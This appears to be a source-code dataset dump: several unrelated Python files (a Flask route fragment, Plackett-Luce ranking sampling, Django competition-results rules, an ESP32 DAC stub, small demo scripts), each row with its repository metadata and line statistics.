        """Stop the development server (werkzeug-only hook)."""
        func = request.environ.get('werkzeug.server.shutdown')
        if func is None:
            raise RuntimeError('Not running with the Werkzeug Server')
        func()
        return dumps({
            'status': 'OK',
            'result': "Shutting down..."
        })
    @app.route('/result', methods=['GET', 'POST'])
    def route_result():
        """Return (and consume) the stored result for message ``id``."""
        logger.debug("We're being asked about a result")
        try:
            message_id = str(request.args['id'])
            with server.messages_lock:
                if message_id in server.messages:
                    logger.debug("message %r found in queue", message_id)
                    # Pop the message so each result can be fetched only once.
                    message = server.messages[message_id]
                    del server.messages[message_id]
                    result_type = message.result_type
                    result_data = message.result_data
                else:
                    logger.debug("message %r NOT found in queue", message_id)
                    result_type = 'NotFound'
                    result_data = 'Result may not be ready or it ' \
                                  'might have expired'
        except Exception:
            # Never let an internal error escape the handler; report it instead.
            result_data = 'Exception in server while attempting to reply'
            result_type = 'Error'
            logger.error(result_data, exc_info=True)
        return dumps({
            'status': result_type,
            'result': result_data
        })
| 31.449275 | 77 | 0.556682 | 0 | 0 | 0 | 0 | 1,838 | 0.847005 | 0 | 0 | 557 | 0.256682 |
2be5546ca3ebe936128f790d55f4f07b21737e0c | 4,932 | py | Python | utils/plackettluce.py | HarrieO/2021-SIGIR-plackett-luce-optimization | 969fc6681d179a5835137bc0115c9a8e868a83ec | [
"MIT"
] | 21 | 2021-05-07T09:49:51.000Z | 2022-03-28T19:10:06.000Z | utils/plackettluce.py | HarrieO/2021-SIGIR-plackett-luce-optimization | 969fc6681d179a5835137bc0115c9a8e868a83ec | [
"MIT"
] | 2 | 2021-07-29T04:19:33.000Z | 2021-09-10T08:41:22.000Z | utils/plackettluce.py | HarrieO/2021-SIGIR-plackett-luce-optimization | 969fc6681d179a5835137bc0115c9a8e868a83ec | [
"MIT"
] | 3 | 2021-06-25T08:08:53.000Z | 2021-09-14T23:53:53.000Z | # Copyright (C) H.R. Oosterhuis 2021.
# Distributed under the MIT License (see the accompanying README.md and LICENSE files).
import numpy as np
import utils.ranking as rnk
def sample_rankings(log_scores, n_samples, cutoff=None, prob_per_rank=False):
    """Sample rankings from the Plackett-Luce model defined by *log_scores*.

    Sequentially samples one document per rank position; at each step the
    already-placed documents are masked out (set to -inf) and the
    remaining scores are renormalized via softmax.

    :param log_scores: 1-D array of per-document log scores.
    :param n_samples: number of rankings to sample.
    :param cutoff: optional ranking length; defaults to all documents.
    :param prob_per_rank: if True, also return the mean placement
        probability of every document at every rank.
    :return: (rankings, inv_rankings, rankings_prob[, rank_prob_matrix]);
        inv_rankings holds each document's rank (ranking_len for
        documents beyond the cutoff).
    """
    n_docs = log_scores.shape[0]
    ind = np.arange(n_samples)
    if cutoff:
        ranking_len = min(n_docs, cutoff)
    else:
        ranking_len = n_docs
    if prob_per_rank:
        rank_prob_matrix = np.empty((ranking_len, n_docs), dtype=np.float64)
    # Work on per-sample copies; placed documents get masked per sample.
    log_scores = np.tile(log_scores[None,:], (n_samples, 1))
    rankings = np.empty((n_samples, ranking_len), dtype=np.int32)
    inv_rankings = np.empty((n_samples, n_docs), dtype=np.int32)
    rankings_prob = np.empty((n_samples, ranking_len), dtype=np.float64)
    if cutoff:
        # Documents never placed keep rank == ranking_len.
        inv_rankings[:] = ranking_len
    for i in range(ranking_len):
        # Shift so the max is 18: numerical stabilization before exp().
        log_scores += 18 - np.amax(log_scores, axis=1)[:, None]
        log_denom = np.log(np.sum(np.exp(log_scores), axis=1))
        probs = np.exp(log_scores - log_denom[:, None])
        if prob_per_rank:
            rank_prob_matrix[i, :] = np.mean(probs, axis=0)
        # Inverse-CDF sampling: count how many cumulative probs the
        # uniform draw exceeds to pick the sampled index.
        cumprobs = np.cumsum(probs, axis=1)
        random_values = np.random.uniform(size=n_samples)
        greater_equal_mask = np.greater_equal(random_values[:,None], cumprobs)
        sampled_ind = np.sum(greater_equal_mask, axis=1)
        rankings[:, i] = sampled_ind
        inv_rankings[ind, sampled_ind] = i
        rankings_prob[:, i] = probs[ind, sampled_ind]
        # Mask the placed document so it cannot be sampled again.
        log_scores[ind, sampled_ind] = np.NINF
    if prob_per_rank:
        return rankings, inv_rankings, rankings_prob, rank_prob_matrix
    else:
        return rankings, inv_rankings, rankings_prob
def gumbel_sample_rankings(log_scores, n_samples, cutoff=None,
                           inverted=False, doc_prob=False,
                           prob_per_rank=False, return_gumbel=False):
  """Sample Plackett-Luce rankings with the Gumbel-max trick.

  Sorting (log_scores + Gumbel noise) yields exact Plackett-Luce samples
  in one vectorized pass instead of sequential sampling.

  Args:
    log_scores: 1-D array of per-document log scores (length n_docs).
    n_samples: number of rankings to sample.
    cutoff: optional ranking length (min(n_docs, cutoff) positions).
    inverted: passed to rnk.multiple_cutoff_rankings as `invert`.
    doc_prob: if True, also compute the placement probability of every
      sampled pick (requires a sequential pass).
    prob_per_rank: if True (with doc_prob), also return the mean placement
      probability of every document at every rank.
    return_gumbel: if True, also return the negated perturbed scores.

  Returns:
    (rankings, inv_rankings, rankings_prob, rank_prob_matrix, gumbel_scores)
    where entries not requested are None.
  """
  n_docs = log_scores.shape[0]
  ind = np.arange(n_samples)

  if cutoff:
    ranking_len = min(n_docs, cutoff)
  else:
    ranking_len = n_docs

  if prob_per_rank:
    rank_prob_matrix = np.empty((ranking_len, n_docs), dtype=np.float64)

  # Negated so that an ascending sort in the ranking helper corresponds to
  # descending perturbed scores.
  gumbel_samples = np.random.gumbel(size=(n_samples, n_docs))
  gumbel_scores = -(log_scores[None,:]+gumbel_samples)

  rankings, inv_rankings = rnk.multiple_cutoff_rankings(
                gumbel_scores,
                ranking_len,
                invert=inverted)

  if not doc_prob:
    if not return_gumbel:
      return rankings, inv_rankings, None, None, None
    else:
      return rankings, inv_rankings, None, None, gumbel_scores

  # Sequential pass to recover the probability of every sampled pick.
  log_scores = np.tile(log_scores[None,:], (n_samples, 1))
  rankings_prob = np.empty((n_samples, ranking_len), dtype=np.float64)
  for i in range(ranking_len):
    # Shift so the per-row maximum is 18: keeps exp() in a stable range.
    log_scores += 18 - np.amax(log_scores, axis=1)[:, None]
    log_denom = np.log(np.sum(np.exp(log_scores), axis=1))
    probs = np.exp(log_scores - log_denom[:, None])
    if prob_per_rank:
      rank_prob_matrix[i, :] = np.mean(probs, axis=0)
    rankings_prob[:, i] = probs[ind, rankings[:, i]]
    # -inf removes already-placed documents from the next softmax.
    # (np.NINF was removed in NumPy 2.0; use -np.inf instead.)
    log_scores[ind, rankings[:, i]] = -np.inf

  if return_gumbel:
    gumbel_return_values = gumbel_scores
  else:
    gumbel_return_values = None

  if prob_per_rank:
    return rankings, inv_rankings, rankings_prob, rank_prob_matrix, gumbel_return_values
  else:
    return rankings, inv_rankings, rankings_prob, None, gumbel_return_values
def metrics_based_on_samples(sampled_rankings,
                             weight_per_rank,
                             addition_per_rank,
                             weight_per_doc,):
  """Estimate a rank-weighted metric from sampled rankings.

  The metric per rank is mean-over-samples of
  weight_per_doc[placed doc] * weight_per_rank[rank], plus
  addition_per_rank[rank]; the estimate is the sum over ranks.
  """
  cutoff = sampled_rankings.shape[1]
  placed_doc_weights = weight_per_doc[sampled_rankings]
  weighted = placed_doc_weights * weight_per_rank[None, :cutoff]
  per_rank_estimate = np.mean(weighted, axis=0) + addition_per_rank[:cutoff]
  return np.sum(per_rank_estimate, axis=0)
def datasplit_metrics(data_split,
                      policy_scores,
                      weight_per_rank,
                      addition_per_rank,
                      weight_per_doc,
                      query_norm_factors=None,
                      n_samples=1000):
  """Estimate ranking metrics averaged over every query in a data split.

  For each query with at least one non-zero document weight, `n_samples`
  rankings are sampled from the policy scores (Gumbel trick) and the
  rank-weighted metric is estimated via metrics_based_on_samples.

  Args (shapes inferred from usage in this module):
    data_split: split object exposing num_queries() and
      query_values_from_vector(qid, vector) -- TODO confirm exact API.
    policy_scores: per-document log-score vector covering the whole split.
    weight_per_rank: 2-D array; axis 0 sets the ranking cutoff, axis 1 the
      number of metrics computed in parallel.
    addition_per_rank: per-rank additive term, indexed up to the cutoff.
    weight_per_doc: per-document weight vector covering the whole split.
    query_norm_factors: optional per-query normalization factors; results
      are divided by them before averaging.
    n_samples: number of sampled rankings per query.

  Returns:
    Mean metric value(s) over all queries, one per column of
    weight_per_rank.
  """
  cutoff = weight_per_rank.shape[0]
  n_queries = data_split.num_queries()
  results = np.zeros((n_queries, weight_per_rank.shape[1]),)
  for qid in range(n_queries):
    q_doc_weights = data_split.query_values_from_vector(qid, weight_per_doc)
    # Queries with only zero weights contribute zero; skip the sampling.
    if not np.all(np.equal(q_doc_weights, 0.)):
      q_policy_scores = data_split.query_values_from_vector(qid, policy_scores)
      sampled_rankings = gumbel_sample_rankings(q_policy_scores,
                                                n_samples,
                                                cutoff=cutoff)[0]
      results[qid] = metrics_based_on_samples(sampled_rankings,
                                              weight_per_rank,
                                              addition_per_rank,
                                              q_doc_weights[:, None])
  if query_norm_factors is not None:
    results /= query_norm_factors
  return np.mean(results, axis=0)
| 37.648855 | 88 | 0.642741 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 124 | 0.025142 |
2be5e7e6410c2cc0d07e72d3dc8d06cec338bdde | 575 | py | Python | demo_train.py | ryanfwy/image-quality | a7d0859e2bc6493885b41fd6aa85a9dfa980c656 | [
"MIT"
] | 1 | 2020-09-09T13:35:12.000Z | 2020-09-09T13:35:12.000Z | demo_train.py | ryanfwy/image-quality | a7d0859e2bc6493885b41fd6aa85a9dfa980c656 | [
"MIT"
] | null | null | null | demo_train.py | ryanfwy/image-quality | a7d0859e2bc6493885b41fd6aa85a9dfa980c656 | [
"MIT"
] | null | null | null | '''Train Siamese NIMA model networks.'''
from model.siamese_nima import SiameseNIMA
if __name__ == '__main__':
    # Paths to the demo training images and the accompanying metadata CSV
    # (presumably image/score pairs -- TODO confirm against load_data()).
    train_image_dir = './assets/demo/train_images'
    train_data_path = './assets/demo/train_data.csv'
    # Build the Siamese NIMA model, load the demo data and train it,
    # starting from the pre-trained NIMA weights.
    siamese = SiameseNIMA(output_dir='./assets')
    train_raw = siamese.load_data(train_image_dir, train_data_path)
    siamese.train(train_raw,
                  epochs=5,
                  batch_size=16,
                  nima_weight_path='./assets/weights/nima_weights_pre_trained.h5')
| 31.944444 | 82 | 0.673043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 220 | 0.382609 |
2be7223c4ab9ef92f6e5ecb73db51d52ed5811e3 | 132 | py | Python | quine_examples/quine_list.py | mbrown1413/Arbitrary-Quine | 758d55a590074d94f0b0f71dd0312923265a5a36 | [
"MIT"
] | 2 | 2016-07-18T14:05:48.000Z | 2021-12-05T11:35:06.000Z | quine_examples/quine_list.py | mbrown1413/Arbitrary-Quine | 758d55a590074d94f0b0f71dd0312923265a5a36 | [
"MIT"
] | null | null | null | quine_examples/quine_list.py | mbrown1413/Arbitrary-Quine | 758d55a590074d94f0b0f71dd0312923265a5a36 | [
"MIT"
] | null | null | null | lines = ['print "lines =", lines', 'for line in lines:', ' print line']
# Python 2 quine: prints the `lines` list assignment followed by each of
# its statements, reproducing the source.  NOTE(review): any line added to
# this file (including comments like this one) must also be appended to
# `lines` for the program's output to keep matching its own source.
print "lines =", lines
for line in lines:
    print line
| 26.4 | 74 | 0.613636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 69 | 0.522727 |
2be7280a605239a4f17fa1972d21696add9fd5df | 6,679 | py | Python | trojsten/rules/kms.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 5 | 2018-04-22T22:44:02.000Z | 2021-04-26T20:44:44.000Z | trojsten/rules/kms.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 250 | 2018-04-24T12:04:11.000Z | 2022-03-09T06:56:47.000Z | trojsten/rules/kms.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 8 | 2019-04-28T11:33:03.000Z | 2022-02-26T13:30:36.000Z | # -*- coding: utf-8 -*-
import datetime
from django.db.models import Count, Q
from django.utils import timezone
from trojsten.events.models import EventParticipant
from trojsten.people.constants import SCHOOL_YEAR_END_MONTH
from trojsten.results.constants import COEFFICIENT_COLUMN_KEY
from trojsten.results.generator import CategoryTagKeyGeneratorMixin, ResultsGenerator
from trojsten.results.representation import ResultsCell, ResultsCol, ResultsTag
from trojsten.submit.models import Submit
from .default import CompetitionRules
from .default import FinishedRoundsResultsRulesMixin as FinishedRounds
# Result-table category keys.
KMS_ALFA = "alfa"
KMS_BETA = "beta"
# Users with coefficient <= 3 compete in alfa; higher coefficients in beta.
KMS_ALFA_MAX_COEFFICIENT = 3
# Indexed by task number: a task counts only if the user's coefficient is
# at most the bound; 100 effectively means "no restriction".
KMS_ELIGIBLE_FOR_TASK_BOUND = [0, 2, 3, 5, 100, 100, 100, 100, 100, 100, 100]
# Indexed by task number: above this coefficient the task is worth only
# half points (rounded up) -- see get_cell_points_for_row_total().
KMS_FULL_POINTS_BOUND = [0, 1, 2, 3, 5, 8, 100, 100, 100, 100, 100]
# Event type names used to look up camps and MO finals in the events app.
KMS_CAMP_TYPE = "KMS sústredenie"
KMS_MO_FINALS_TYPE = "CKMO"
# Camps older than this many years are ignored when counting semesters.
KMS_YEARS_OF_CAMPS_HISTORY = 10
class KMSResultsGenerator(CategoryTagKeyGeneratorMixin, ResultsGenerator):
    """Results generator for KMS with per-user difficulty coefficients.

    A user's coefficient = school year + number of successful camp
    semesters + number of past MO-final participations.  The coefficient
    decides category membership (alfa/beta), which tasks count for the
    user, and whether a task is worth only half points.
    """
    def __init__(self, tag):
        super(KMSResultsGenerator, self).__init__(tag)
        # Lazy per-round caches filled by prepare_coefficients().
        self.camps = None
        self.mo_finals = None
        # Memoized coefficients keyed by user.
        self.coefficients = {}
    def get_user_coefficient(self, user, round):
        """Return (and memoize) the user's coefficient as of `round`."""
        if user not in self.coefficients:
            # NOTE(review): `not self.camps` is also True for an empty dict,
            # so the DB queries re-run whenever no camps/finals exist at all.
            if not self.camps or not self.mo_finals:
                self.prepare_coefficients(round)
            year = user.school_year_at(round.end_time)
            successful_semesters = self.camps.get(user.pk, 0)
            mo_finals = self.mo_finals.get(user.pk, 0)
            self.coefficients[user] = year + successful_semesters + mo_finals
        return self.coefficients[user]
    def prepare_coefficients(self, round):
        """
        Fetch from the db number of successful semester and number of participation
        in MO final for each user and store them in dictionaries. The prepared
        data in dictionaries are used to compute the coefficient of a given user.
        We consider only events happened before given round, so the coefficients are computed
        correct in older results.
        """
        # We count only MO finals in previous school years, the user coefficient remains the same
        # during a semester. We assume that the MO finals are held in the last semester
        # of a year.
        school_year = round.end_time.year - int(round.end_time.month < SCHOOL_YEAR_END_MONTH)
        prev_school_year_end = timezone.make_aware(
            datetime.datetime(school_year, SCHOOL_YEAR_END_MONTH, 28)
        )
        # Map: user pk -> number of past MO-final participations.
        self.mo_finals = dict(
            EventParticipant.objects.filter(
                event__type__name=KMS_MO_FINALS_TYPE, event__end_time__lt=prev_school_year_end
            )
            .values("user")
            .annotate(mo_finals=Count("event"))
            .values_list("user", "mo_finals")
        )
        # We ignore camps that happened before KMS_YEARS_OF_CAMPS_HISTORY years, so we don't
        # produce too big dictionaries of users.
        # Map: user pk -> number of distinct semesters with a camp attended.
        self.camps = dict(
            EventParticipant.objects.filter(
                Q(
                    event__type__name=KMS_CAMP_TYPE,
                    event__end_time__lt=round.end_time,
                    event__end_time__year__gte=round.end_time.year - KMS_YEARS_OF_CAMPS_HISTORY,
                ),
                Q(going=True) | Q(type=EventParticipant.PARTICIPANT),
            )
            .values("user")
            .annotate(camps=Count("event__semester", distinct=True))
            .values_list("user", "camps")
        )
    def get_cell_points_for_row_total(self, res_request, cell, key, coefficient):
        """Points a task contributes: full, or half (rounded up) when the
        user's coefficient exceeds the task's full-points bound, or for
        task 3 in the beta category."""
        return (
            (1 + self.get_cell_total(res_request, cell)) // 2
            if KMS_FULL_POINTS_BOUND[key] < coefficient or (self.tag.key == KMS_BETA and key == 3)
            else self.get_cell_total(res_request, cell)
        )
    def run(self, res_request):
        """Precompute coefficient caches and the set of users with a
        submit to a beta-only task (numbers 8-10), then delegate."""
        self.prepare_coefficients(res_request.round)
        res_request.has_submit_in_beta = set()
        for submit in Submit.objects.filter(
            task__round__semester=res_request.round.semester, task__number__in=[8, 9, 10]
        ).select_related("user"):
            res_request.has_submit_in_beta.add(submit.user)
        return super(KMSResultsGenerator, self).run(res_request)
    def is_user_active(self, request, user):
        """Category membership: alfa needs coefficient <= 3; beta needs a
        higher coefficient or an explicit submit to a beta task."""
        active = super(KMSResultsGenerator, self).is_user_active(request, user)
        coefficient = self.get_user_coefficient(user, request.round)
        if self.tag.key == KMS_ALFA:
            active = active and (coefficient <= KMS_ALFA_MAX_COEFFICIENT)
        if self.tag.key == KMS_BETA:
            active = active and (
                coefficient > KMS_ALFA_MAX_COEFFICIENT or user in request.has_submit_in_beta
            )
        return active
    def deactivate_row_cells(self, request, row, cols):
        """Deactivate tasks the user is not eligible for, then keep only
        the user's best 5 remaining tasks."""
        coefficient = self.get_user_coefficient(row.user, request.round)
        # Count only tasks your coefficient is eligible for
        for key in row.cells_by_key:
            if KMS_ELIGIBLE_FOR_TASK_BOUND[key] < coefficient:
                row.cells_by_key[key].active = False
        # Prepare list of pairs consisting of cell and its points.
        tasks = [
            (cell, self.get_cell_points_for_row_total(request, cell, key, coefficient))
            for key, cell in row.cells_by_key.items()
            if row.cells_by_key[key].active
        ]
        # Count only the best 5 tasks
        for cell, _ in sorted(tasks, key=lambda x: x[1])[:-5]:
            cell.active = False
    def calculate_row_round_total(self, res_request, row, cols):
        """Round total = sum of (possibly halved) points of active cells."""
        coefficient = self.get_user_coefficient(row.user, res_request.round)
        row.round_total = sum(
            self.get_cell_points_for_row_total(res_request, cell, key, coefficient)
            for key, cell in row.cells_by_key.items()
            if cell.active
        )
    def add_special_row_cells(self, res_request, row, cols):
        """Append the user's coefficient as an extra display cell."""
        super(KMSResultsGenerator, self).add_special_row_cells(res_request, row, cols)
        coefficient = self.get_user_coefficient(row.user, res_request.round)
        row.cells_by_key[COEFFICIENT_COLUMN_KEY] = ResultsCell(str(coefficient))
    def create_results_cols(self, res_request):
        """Prepend the coefficient column ("K.") to the standard columns."""
        yield ResultsCol(key=COEFFICIENT_COLUMN_KEY, name="K.")
        for col in super(KMSResultsGenerator, self).create_results_cols(res_request):
            yield col
class KMSRules(FinishedRounds, CompetitionRules):
    """Competition rules for KMS: two result categories, alfa and beta,
    both produced by KMSResultsGenerator."""
    # Published result tables, keyed by category key.
    RESULTS_TAGS = {
        KMS_ALFA: ResultsTag(key=KMS_ALFA, name="Alfa"),
        KMS_BETA: ResultsTag(key=KMS_BETA, name="Beta"),
    }
    RESULTS_GENERATOR_CLASS = KMSResultsGenerator
| 39.755952 | 98 | 0.672855 | 5,756 | 0.861677 | 215 | 0.032186 | 0 | 0 | 0 | 0 | 977 | 0.146257 |
2be799f355f713970380efb0ff0e7ecb819eb1f7 | 77 | py | Python | terrascript/consul/__init__.py | hugovk/python-terrascript | 08fe185904a70246822f5cfbdc9e64e9769ec494 | [
"BSD-2-Clause"
] | null | null | null | terrascript/consul/__init__.py | hugovk/python-terrascript | 08fe185904a70246822f5cfbdc9e64e9769ec494 | [
"BSD-2-Clause"
] | null | null | null | terrascript/consul/__init__.py | hugovk/python-terrascript | 08fe185904a70246822f5cfbdc9e64e9769ec494 | [
"BSD-2-Clause"
] | 1 | 2018-11-15T16:23:05.000Z | 2018-11-15T16:23:05.000Z | # Consul provider is not created through makecode.py
# because of issue #24.
| 25.666667 | 52 | 0.779221 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 75 | 0.974026 |
2be8a156acf59142491eb2fae24285870882e1a5 | 4,333 | py | Python | dac.py | hurasum/esp32_python | 59302ea48c3e1e0190fed09f78bb18d5f49b9c71 | [
"Unlicense"
] | null | null | null | dac.py | hurasum/esp32_python | 59302ea48c3e1e0190fed09f78bb18d5f49b9c71 | [
"Unlicense"
] | 1 | 2021-12-14T09:34:25.000Z | 2021-12-20T13:41:03.000Z | dac.py | hurasum/esp32_python | 59302ea48c3e1e0190fed09f78bb18d5f49b9c71 | [
"Unlicense"
] | null | null | null | """
DAC typing class
ESP32 has two 8-bit DAC (digital to analog converter) channels, connected to GPIO25 (Channel 1) and GPIO26 (Channel 2).
The DAC driver allows these channels to be set to arbitrary voltages. The DAC channels can also be driven with DMA-style written sample data, via the I2S driver when using the "built-in DAC mode".
This class includes full support for using ESP32 DAC peripheral.
ESP32 DAC output voltage range is 0-Vdd (3.3 V), the resolution is 8-bits
"""
class DAC:
    """Stub/typing class describing the ESP32 DAC API; method bodies are
    intentionally empty.  Output range is 0-3.3 V at 8-bit resolution."""
    def deinit(self):
        """Deinitialize the dac object and free the pin used."""
        pass
    def write(self, value):
        """Set the raw DAC output value.

        Args:
            value: 0-255; the value 255 drives the dac pin to 3.3 V.
        """
        pass
    def waveform(self, freq, type ,duration=0 ,scale=0 ,offset=0 ,invert=2):
        """Generate a waveform on the dac output.

        Args:
            freq: waveform frequency in Hz; valid range depends on type:
                sine 16-32000, noise 500-32000, triangle 170-3600,
                ramp/sawtooth 170-7200.
            type: one of the defined constants SINE, TRIANGLE, RAMP,
                SAWTOOTH, NOISE.  (NOTE(review): shadows the builtin
                `type`; kept for API compatibility.)
            duration: optional; if given, wait `duration` ms, then stop
                the waveform.
            scale: optional, sine only; 0-3; scale the output voltage by
                2^scale.
            offset: optional, sine only; 0-255; offset the output voltage
                by this value.
            invert: optional, sine only; 0-3; invert the half-cycles of
                the sine wave.
        """
        pass
    def beep(self, freq, duration ,scale=0):
        """Generate a sine-wave beep on the dac output.

        Args:
            freq: frequency in Hz; valid range 16-32000.
            duration: duration of the beep in ms.
            scale: optional; 0-3; scale the output voltage by 2^scale.
        """
        pass
    def write_timed(self, data, samplerate ,mode ,wait=False):
        """Output 8-bit DAC samples from an array or file via the ESP32
        I2S peripheral.

        Data obtained with machine.ADC.read_timed() can be used directly.

        Args:
            data: array of type 'B' / bytearray, or a filename whose
                contents will be output.
            samplerate: output sample rate; valid range 5000-500000 Hz.
            mode: optional, default machine.DAC.NORMAL; with
                machine.DAC.CIRCULAR the data repeats until stopped.
            wait: optional, default False; if True, block until the
                output finishes.
        """
        pass
    def write_buffer(self, data, freq ,mode ,wait=False):
        """Output 8-bit DAC samples from an array using a timer.

        Data obtained with machine.ADC.collect() can be used directly.

        Args:
            data: array object of type 'B'.
            freq: output frequency; valid range 0.001-18000 Hz (float
                values allowed).
            mode: optional, default machine.DAC.NORMAL; with
                machine.DAC.CIRCULAR the data repeats indefinitely
                (clicks can occur if the first and last samples differ).
            wait: optional, default False; if True, block until the
                output finishes.
        """
        pass
    def wavplay(self, wavfile, correct):
        """Play a WAV file on the dac pin.

        Only PCM, 8-bit, mono WAV files with sample rate >= 22000 Hz can
        be played.

        Args:
            wavfile: path of the WAV file.
            correct: sample-rate correction factor; allowed range
                -8.0 to +8.0.  NOTE(review): described as optional in the
                original docs but the signature has no default value.
        """
        pass
    def stopwave(self):
        """Stop the background process started by dac.waveform(),
        dac.write_timed() or dac.wavplay()."""
        pass
| 39.036036 | 199 | 0.647357 | 3,843 | 0.886096 | 0 | 0 | 0 | 0 | 0 | 0 | 3,783 | 0.872262 |
2bead42e8898fc07fa3042e49464fb1267055a6b | 44 | py | Python | vuln/__init__.py | Maskhe/DongTai-engine | 70d61617e4ba469adf8cf97879820d8a09a0359c | [
"Apache-2.0"
] | 16 | 2021-09-01T05:59:56.000Z | 2022-01-17T11:44:39.000Z | vuln/__init__.py | Maskhe/DongTai-engine | 70d61617e4ba469adf8cf97879820d8a09a0359c | [
"Apache-2.0"
] | 14 | 2021-09-17T10:00:20.000Z | 2022-02-15T10:55:32.000Z | vuln/__init__.py | Maskhe/DongTai-engine | 70d61617e4ba469adf8cf97879820d8a09a0359c | [
"Apache-2.0"
] | 26 | 2021-09-01T06:29:54.000Z | 2022-03-25T02:38:55.000Z | default_app_config = 'vuln.apps.VulnConfig'
| 22 | 43 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 22 | 0.5 |
2beb29bae6bf723ff96a9ddff8637a07400b2281 | 573 | py | Python | examples/itemrank_quick_query.py | cclauss/predictionio-sdk-python | 0de59e3d72afd2ba30121c2ab033715eb63e879f | [
"Apache-2.0"
] | 63 | 2015-01-07T19:49:59.000Z | 2016-09-22T01:53:13.000Z | examples/itemrank_quick_query.py | cclauss/predictionio-sdk-python | 0de59e3d72afd2ba30121c2ab033715eb63e879f | [
"Apache-2.0"
] | 8 | 2015-01-07T17:28:25.000Z | 2016-06-24T04:56:19.000Z | examples/itemrank_quick_query.py | cclauss/predictionio-sdk-python | 0de59e3d72afd2ba30121c2ab033715eb63e879f | [
"Apache-2.0"
] | 30 | 2015-01-08T19:12:05.000Z | 2016-09-17T07:56:24.000Z | """
itemrank quickstart query
"""
import predictionio
# Connect to the locally deployed ItemRank engine.
client = predictionio.EngineClient("http://localhost:8000")

try:
  # Rank item 1 to 5 for each user; the last user id intentionally does not
  # exist, to demonstrate the engine's error response.
  item_ids = [str(i) for i in range(1, 6)]
  user_ids = [str(x) for x in range(1, 6)] + ["NOT_EXIST_USER"]
  for user_id in user_ids:
    print("Rank item 1 to 5 for user ", user_id)
    try:
      response = client.send_query({
        "uid": user_id,
        "iids": item_ids
      })
      print(response)
    except predictionio.PredictionIOAPIError as e:
      print("Caught exception: ", e)
finally:
  # Fix: always close the client, even if an unexpected error interrupts
  # the loop, so the connection is not leaked.
  client.close()
| 23.875 | 61 | 0.630017 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 163 | 0.284468 |
2bec0c607c3e98c35152779520d4098296b2008b | 226 | py | Python | key_server/key_management_system/apps.py | TV-Encryption/key_server | db243f3941cef82a9eb8f01bbb3fa72d7b32d77e | [
"MIT"
] | null | null | null | key_server/key_management_system/apps.py | TV-Encryption/key_server | db243f3941cef82a9eb8f01bbb3fa72d7b32d77e | [
"MIT"
] | null | null | null | key_server/key_management_system/apps.py | TV-Encryption/key_server | db243f3941cef82a9eb8f01bbb3fa72d7b32d77e | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class KeyManagementSystemConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "key_server.key_management_system"
verbose_name = "Key Management System"
| 28.25 | 56 | 0.787611 | 189 | 0.836283 | 0 | 0 | 0 | 0 | 0 | 0 | 88 | 0.389381 |
2beed0513a5ba2c61181277b03a553d3464d028b | 1,121 | py | Python | Interesting Python Questions/solve equation.py | liu-yunfei/Python | 314cdc98f32f4f0de2c0904279865b944e34dd75 | [
"MIT"
] | 1 | 2020-10-08T09:29:59.000Z | 2020-10-08T09:29:59.000Z | Interesting Python Questions/solve equation.py | liu-yunfei/Python | 314cdc98f32f4f0de2c0904279865b944e34dd75 | [
"MIT"
] | 1 | 2021-01-30T12:04:51.000Z | 2021-01-30T12:05:37.000Z | Interesting Python Questions/solve equation.py | liu-yunfei/Python | 314cdc98f32f4f0de2c0904279865b944e34dd75 | [
"MIT"
def f(x):
    """Objective polynomial: f(x) = 2x^4 + 3x^3 - 6x^2 + 5x - 8."""
    # Fix: the original `def` line was corrupted by fused metadata junk.
    # Horner form of 2*x**4 + 3*x**3 - 6*x**2 + 5*x - 8.
    return (((2 * x + 3) * x - 6) * x + 5) * x - 8
def reachEnd(previousm, currentm):
    """Return True when successive midpoint estimates have converged,
    i.e. they differ by at most 1e-6."""
    # Direct boolean return instead of the if/return-True/return-False idiom.
    return abs(previousm - currentm) <= 10 ** (-6)
def printFormat(a,b,c,m,count):
    """Print one search iteration: interval points, midpoint, and f values."""
    fa, fb, fc, fm = f(a), f(b), f(c), f(m)
    step_lines = [
        "Step %s" % count,
        "a=%.6f b=%.6f c=%.6f" % (a, b, c),
        "f(a)=%.6f f(b)=%.6f f(c)=%.6f" % (fa, fb, fc),
        "m=%.6f f(m)=%.6f" % (m, fm),
    ]
    for step_line in step_lines:
        print(step_line)
def main(a,b,c):
    """Search for a local minimum of f on [a, b] by repeated bisection.

    Preconditions (returns False if violated): a < b, c < b, and f(c)
    below both f(a) and f(b), i.e. (a, c, b) brackets a minimum.
    NOTE(review): a < c is not checked explicitly.

    Each step probes the midpoint m of the larger of the two
    sub-intervals and shrinks the bracket, keeping the lowest point as
    the new c.  Iteration stops when successive midpoints differ by at
    most 1e-6 (see reachEnd), then the minimum found is printed.
    """
    if (not (a < b and c < b)) or (not(f(a) > f(c) and f(b) > f(c))):
        return False
    count = 0
    # Sentinel that can never equal the first midpoint, so the loop runs
    # at least once before the convergence test can succeed.
    previousm = b+1
    while True:
        if (b - c) >= (c - a):
            # Right sub-interval [c, b] is the larger: probe its midpoint.
            m = (b+c)/2
            if f(m) >= f(c):
                b = m
            else:
                a = c
                c = m
        else:
            # Left sub-interval [a, c] is the larger: probe its midpoint.
            m = (a+c)/2
            if f(m) >= f(c):
                a = m
            else:
                b = c
                c = m
        printFormat(a,b,c,m,count)
        if reachEnd(previousm,m):
            print("Minimum value=%.6f occurring at %.6f" %(f(m),m))
            break
        previousm = m
        count += 1
main(-3,-1,-2.2)
| 26.069767 | 70 | 0.373773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 118 | 0.105263 |
2befdc8b109984b8d25e62dc78641cf77c167810 | 15,020 | py | Python | sensor.py | vorian77/driving_simulator | 92967eeeaa8cb789725fc89e77af2a80152708c0 | [
"MIT"
] | null | null | null | sensor.py | vorian77/driving_simulator | 92967eeeaa8cb789725fc89e77af2a80152708c0 | [
"MIT"
